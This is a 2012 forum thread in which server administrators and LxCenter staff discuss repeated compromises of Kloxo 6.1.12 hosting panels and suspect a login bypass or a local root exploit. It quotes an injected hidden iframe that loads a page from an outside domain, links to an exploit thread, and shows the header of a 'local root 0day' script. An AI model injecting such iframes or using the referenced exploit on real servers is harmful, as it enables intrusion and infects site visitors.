Hmm, will try to check it; however, I'm not that strong on the server management side.
While I was configuring the firewall they hacked the server again with:

<html><body>
<iframe width="0" height="0" src="http://www.myfriendsandyour.com/999.html" frameborder="0"></iframe>
</body></html>


This time I can see the IP logged in to Admin on Kloxo:
client-admin 5.39.11.14 15:28 25 Sep Still Logged -

How could this be possible when the password is 16 letters long?!

Re: Kloxo 6.1.12 Hack [message #101981 is a reply to message #101980] Tue, 25 September 2012 09:51
shazar (United States), Grandmaster, LxCenter Core Team Member, LxCenter Representative:
Well if this is logged in through Kloxo, then I am wrong about the way this was hacked. Do you login through http or https? It is looking more and more like there could be some kind of injection attack to login to Kloxo as admin without the real password...

Re: Kloxo 6.1.12 Hack [message #101983 is a reply to message #101670] Tue, 25 September 2012 10:54
massilia (France), Member:
Perhaps this root exploit:

http://roothackers.net/showthread.php?tid=92&highlight=kloxo

Re: Kloxo 6.1.12 Hack [message #101984 is a reply to message #101983] Tue, 25 September 2012 11:08
shazar (United States), Grandmaster, LxCenter Core Team Member, LxCenter Representative:
A user would need shell access, correct? Did either of you give a user shell access?

Re: Kloxo 6.1.12 Hack [message #101985 is a reply to message #101984] Tue, 25 September 2012 11:15
massilia (France), Member:
No, I don't give shell access, but this post in this forum proves that Kloxo is not very safe.

Re: Kloxo 6.1.12 Hack [message #101986 is a reply to message #101985] Tue, 25 September 2012 11:21
shazar (United States), Grandmaster, LxCenter Core Team Member, LxCenter Representative:
There may be a security issue unrelated to the exploit you are pointing to. I will try to recreate this and post once I have more info.

Re: Kloxo 6.1.12 Hack [message #101988 is a reply to message #101986] Tue, 25 September 2012 13:04
adfieldz (Lithuania), Valuable Member:
My clients had no shell access, at least not on all VPSes. But I very much doubt one of my clients would do this, or could do this, as mostly they have no access except the CMS at all; some of them might have FTP. Shazar - I've sent you logs, so please take a look at them; they might contain traces of the intrusion.

Re: Kloxo 6.1.12 Hack [message #102021 is a reply to message #101988] Wed, 26 September 2012 05:06
lupetalo, Senior Member:
This is some security issue with Kloxo admin. One of my servers got hacked too, with no other access but myself!

Re: Kloxo 6.1.12 Hack [message #102029 is a reply to message #102021] Wed, 26 September 2012 07:10
shazar (United States), Grandmaster, LxCenter Core Team Member, LxCenter Representative:
lupetalo - Yes, I still need to investigate further, but you should cut off access to Kloxo and check your systems to ensure nothing was added and none of the passwords were changed.

Someone has PMed me with some information and I am waiting for further clarification.


Re: Kloxo 6.1.12 Hack [message #102163 is a reply to message #102029] Thu, 27 September 2012 18:13
Mavashi (Ukraine), Member:

Subscribing to topic also. Will wait till lxrestart.c patch released.

Re: Kloxo 6.1.12 Hack [message #102194 is a reply to message #102163] Fri, 28 September 2012 04:50
mustafaramadhan (Yogyakarta, Indonesia), Super Grandmaster, Forum Moderator:

Some points from http://roothackers.net/showthread.php?tid=92&highlight=kloxo above:

1. All clients get the 'apache' user for accessing their website --> only 'pure' mod_php sets all users as 'apache'
2. Possible access to lxphp (special php for kloxo) with different user access via --> start/restart of kloxo will call phpsuexec.sh by lxlighttpd



Re: Kloxo 6.1.12 Hack [message #102206 is a reply to message #102194] Fri, 28 September 2012 06:33
shazar (United States), Grandmaster, LxCenter Core Team Member, LxCenter Representative:
As already stated, that link has nothing to do with apache but has to do with shell access.

[Updated on: Fri, 28 September 2012 06:34]


Re: Kloxo 6.1.12 Hack [message #102207 is a reply to message #102206] Fri, 28 September 2012 06:39
mustafaramadhan (Yogyakarta, Indonesia), Super Grandmaster, Forum Moderator:

How about:
Quote:
#!/bin/sh
# LXLabs Kloxo lxsuexec+lxrestart local root 0day
# 2012 Aurora
# requires you to be the apache user



[Updated on: Fri, 28 September 2012 06:40]


Re: Kloxo 6.1.12 Hack [message #102208 is a reply to message #102207] Fri, 28 September 2012 06:48
lupetalo, Senior Member:
This is not related to the hack, or is not fully described at http://roothackers.net/showthread.php?tid=92&highlight=kloxo, because the server that was hacked had suexec and nobody had shell access.

Re: Kloxo 6.1.12 Hack [message #102210 is a reply to message #102208] Fri, 28 September 2012 07:02
mustafaramadhan (Yogyakarta, Indonesia), Super Grandmaster, Forum Moderator:

I don't know how the hacking works. On my Kloxo-MR I do not use the suexec mechanism, and then there is no need for lxsuexec and lxrestart (safe to delete these 2 files).

